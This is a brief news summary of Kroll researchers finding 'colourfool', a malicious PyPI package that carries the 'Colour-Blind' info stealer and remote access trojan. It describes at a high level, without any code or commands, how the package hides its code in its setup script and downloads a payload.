"Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI"

A malicious Python package uploaded to the Python Package Index (PyPI) was discovered to have a fully-functional information stealer and Remote Access Trojan (RAT). The package named "colourfool" was found by Kroll's Cyber Threat Intelligence team, who dubbed the malware "Colour-Blind." The Colour-Blind malware is indicative of the democratization of cybercrime, which could lead to an enhanced threat landscape, as various variants can be born from code sourced from others, according to Kroll researchers. Similar to other malicious Python modules identified in recent months, the colourfool package hides its malicious code in the setup script, pointing to a Discord-hosted ZIP archive payload. The file contains a Python script (code.py) containing modules designed to record keystrokes, steal cookies, and disable security software. This article continues to discuss the discovery of the malicious colourfool Python package with Colour-Blind malware. 

THN reports "Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI"